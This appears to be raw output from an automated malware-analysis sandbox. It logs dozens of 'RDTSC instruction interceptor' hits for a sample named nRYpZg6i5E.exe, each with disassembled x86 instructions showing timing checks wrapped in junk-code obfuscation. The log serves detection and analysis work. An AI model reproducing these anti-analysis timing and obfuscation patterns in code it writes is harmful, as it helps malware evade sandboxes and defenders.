Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50BA2 second address: 6E50BB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E9559C81h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50BB7 second address: 6E50C98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+04h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD5E912D9ECh 0x00000015 sbb ah, 00000078h 0x00000018 jmp 00007FD5E912D9EBh 0x0000001d popfd 0x0000001e push eax 0x0000001f mov ecx, edx 0x00000021 pop ebx 0x00000022 popad 0x00000023 lea eax, dword ptr [ebx+78h] 0x00000026 pushad 0x00000027 mov bh, ch 0x00000029 call 00007FD5E912D9F9h 0x0000002e push esi 0x0000002f pop edi 0x00000030 pop esi 0x00000031 popad 0x00000032 push 00000001h 0x00000034 jmp 00007FD5E912D9F3h 0x00000039 nop 0x0000003a jmp 00007FD5E912D9F6h 0x0000003f push eax 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007FD5E912D9F1h 0x00000047 adc ax, 4286h 0x0000004c jmp 00007FD5E912D9F1h 0x00000051 popfd 0x00000052 popad 0x00000053 nop 0x00000054 jmp 00007FD5E912D9EDh 0x00000059 lea eax, dword ptr [ebp-08h] 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f call 00007FD5E912D9F3h 0x00000064 pop eax 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50C98 second address: 6E50C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50D84 second address: 6E50DC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9F7h 0x00000009 sub ax, 840Eh 0x0000000e jmp 00007FD5E912D9F9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50DC0 second address: 6E50DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000001h 0x00000009 jmp 00007FD5E9559C7Ch 0x0000000e nop 0x0000000f pushad 0x00000010 mov al, 71h 0x00000012 mov di, C21Eh 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD5E9559C7Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50DEC second address: 6E50E41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 09A6h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FD5E912D9EDh 0x00000010 lea eax, dword ptr [ebp-18h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FD5E912D9F3h 0x0000001c adc esi, 26D4BCDEh 0x00000022 jmp 00007FD5E912D9F9h 0x00000027 popfd 0x00000028 mov ah, 4Bh 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50E41 second address: 6E50E6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov dx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007FD5E9559C7Eh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD5E9559C7Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50E6D second address: 6E50E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E912D9EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50E7F second address: 6E50E83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50F08 second address: 6E50F0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50F0E second address: 6E50F1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50F1E second address: 6E50F22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50F22 second address: 6E50F28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50F28 second address: 6E50F8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pushfd 0x0000000f jmp 00007FD5E912D9F3h 0x00000014 add ecx, 7B10448Eh 0x0000001a jmp 00007FD5E912D9F9h 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 mov edx, 757806ECh 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50F8B second address: 6E50F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50F8F second address: 6E50F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50F9E second address: 6E50FDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 8AAAh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a sub eax, eax 0x0000000c jmp 00007FD5E9559C7Dh 0x00000011 lock cmpxchg dword ptr [edx], ecx 0x00000015 pushad 0x00000016 mov ecx, 20E94203h 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e pop edi 0x0000001f jmp 00007FD5E9559C82h 0x00000024 test eax, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50FDF second address: 6E50FFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E50FFC second address: 6E51002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51002 second address: 6E51006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51006 second address: 6E5106E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FD657E08344h 0x0000000e jmp 00007FD5E9559C7Fh 0x00000013 mov edx, dword ptr [ebp+08h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD5E9559C7Bh 0x0000001d add ax, 981Eh 0x00000022 jmp 00007FD5E9559C89h 0x00000027 popfd 0x00000028 popad 0x00000029 mov eax, dword ptr [esi] 0x0000002b pushad 0x0000002c mov ebx, esi 0x0000002e mov dx, ax 0x00000031 popad 0x00000032 mov dword ptr [edx], eax 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FD5E9559C7Ch 0x0000003d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5106E second address: 6E51072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51072 second address: 6E51078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51078 second address: 6E51093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51093 second address: 6E51097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51097 second address: 6E5109D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5109D second address: 6E510A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510A3 second address: 6E510D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD5E912D9F7h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510D3 second address: 6E510D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510D9 second address: 6E510DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510DD second address: 6E510E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E510E1 second address: 6E51121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD5E912D9EDh 0x00000012 xor si, 6526h 0x00000017 jmp 00007FD5E912D9F1h 0x0000001c popfd 0x0000001d mov esi, 50B7E657h 0x00000022 popad 0x00000023 mov dword ptr [edx+08h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51121 second address: 6E51127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51127 second address: 6E5112D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5112D second address: 6E51131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51131 second address: 6E511B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+0Ch] 0x0000000b pushad 0x0000000c push ecx 0x0000000d jmp 00007FD5E912D9F1h 0x00000012 pop eax 0x00000013 call 00007FD5E912D9F1h 0x00000018 mov ecx, 71674217h 0x0000001d pop eax 0x0000001e popad 0x0000001f mov dword ptr [edx+0Ch], eax 0x00000022 pushad 0x00000023 mov eax, edx 0x00000025 mov bx, FB88h 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+10h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 jmp 00007FD5E912D9F8h 0x00000035 pushfd 0x00000036 jmp 00007FD5E912D9F2h 0x0000003b sub ax, 9118h 0x00000040 jmp 00007FD5E912D9EBh 0x00000045 popfd 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511B6 second address: 6E511BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511BC second address: 6E511C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511C0 second address: 6E511E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+10h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD5E9559C89h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511E8 second address: 6E511EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511EC second address: 6E511F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E511F2 second address: 6E5121E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9ECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD5E912D9F7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51364 second address: 6E513B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+24h], eax 0x0000000c jmp 00007FD5E9559C86h 0x00000011 mov eax, dword ptr [esi+28h] 0x00000014 jmp 00007FD5E9559C80h 0x00000019 mov dword ptr [edx+28h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f call 00007FD5E9559C7Ch 0x00000024 pop ecx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E513B2 second address: 6E51436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FD5E912D9F1h 0x0000000b mov bl, ah 0x0000000d pop ebx 0x0000000e popad 0x0000000f mov ecx, dword ptr [esi+2Ch] 0x00000012 jmp 00007FD5E912D9F8h 0x00000017 mov dword ptr [edx+2Ch], ecx 0x0000001a pushad 0x0000001b movzx esi, dx 0x0000001e pushfd 0x0000001f jmp 00007FD5E912D9F3h 0x00000024 or ax, C5CEh 0x00000029 jmp 00007FD5E912D9F9h 0x0000002e popfd 0x0000002f popad 0x00000030 mov ax, word ptr [esi+30h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD5E912D9EDh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51436 second address: 6E51446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD5E9559C7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51446 second address: 6E5144A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5144A second address: 6E51469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c pushad 0x0000000d mov edx, 6B102790h 0x00000012 mov ecx, edi 0x00000014 popad 0x00000015 mov ax, word ptr [esi+32h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51469 second address: 6E5146D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E5146D second address: 6E51473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51473 second address: 6E514D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E912D9EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD5E912D9F4h 0x00000014 sub cx, 8638h 0x00000019 jmp 00007FD5E912D9EBh 0x0000001e popfd 0x0000001f jmp 00007FD5E912D9F8h 0x00000024 popad 0x00000025 mov eax, dword ptr [esi+34h] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E514D4 second address: 6E514D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E514D9 second address: 6E514E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7FF7686Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E514E3 second address: 6E51519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [edx+34h], eax 0x0000000a pushad 0x0000000b jmp 00007FD5E9559C7Ah 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 mov ecx, 784F940Dh 0x00000018 popad 0x00000019 popad 0x0000001a test ecx, 00000700h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD5E9559C7Fh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E51519 second address: 6E515EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9EFh 0x00000009 or ecx, 515D236Eh 0x0000000f jmp 00007FD5E912D9F9h 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jne 00007FD6579DBBABh 0x00000021 jmp 00007FD5E912D9F3h 0x00000026 or dword ptr [edx+38h], FFFFFFFFh 0x0000002a jmp 00007FD5E912D9F6h 0x0000002f or dword ptr [edx+3Ch], FFFFFFFFh 0x00000033 jmp 00007FD5E912D9F0h 0x00000038 or dword ptr [edx+40h], FFFFFFFFh 0x0000003c jmp 00007FD5E912D9F0h 0x00000041 pop esi 0x00000042 pushad 0x00000043 pushad 0x00000044 mov dh, 84h 0x00000046 mov ax, 89BBh 0x0000004a popad 0x0000004b popad 0x0000004c pop ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007FD5E912D9F6h 0x00000056 jmp 00007FD5E912D9F5h 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E515EA second address: 6E515F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6EA0C41 second address: 6EA0C83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A3EAh 0x00000007 mov dh, 14h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 pushfd 0x00000013 jmp 00007FD5E912D9F4h 0x00000018 adc ecx, 294EAFD8h 0x0000001e jmp 00007FD5E912D9EBh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a movzx esi, dx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E40826 second address: 6E4082C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E4082C second address: 6E40832 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E40832 second address: 6E40836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E40836 second address: 6E4083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6E4083A second address: 6E40871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d pushfd 0x0000000e jmp 00007FD5E9559C7Eh 0x00000013 or si, 61E8h 0x00000018 jmp 00007FD5E9559C7Bh 0x0000001d popfd 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push ebx 0x00000024 pop esi 0x00000025 push edi 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE001D second address: 6DE006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD5E912D9EEh 0x00000009 sbb al, 00000018h 0x0000000c jmp 00007FD5E912D9EBh 0x00000011 popfd 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FD5E912D9F0h 0x00000020 sub cx, CD78h 0x00000025 jmp 00007FD5E912D9EBh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ecx, 35CF8045h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE006F second address: 6DE007D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE007D second address: 6DE0081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0081 second address: 6DE0085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0085 second address: 6DE008B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE008B second address: 6DE00E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 mov dx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007FD5E9559C84h 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushfd 0x0000001a jmp 00007FD5E9559C83h 0x0000001f xor cx, 3FFEh 0x00000024 jmp 00007FD5E9559C89h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE00E7 second address: 6DE00ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE00ED second address: 6DE00F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A0A second address: 6DE0A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A0E second address: 6DE0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: 6DE0A14 second address: 6DE0A1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 6Ah 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
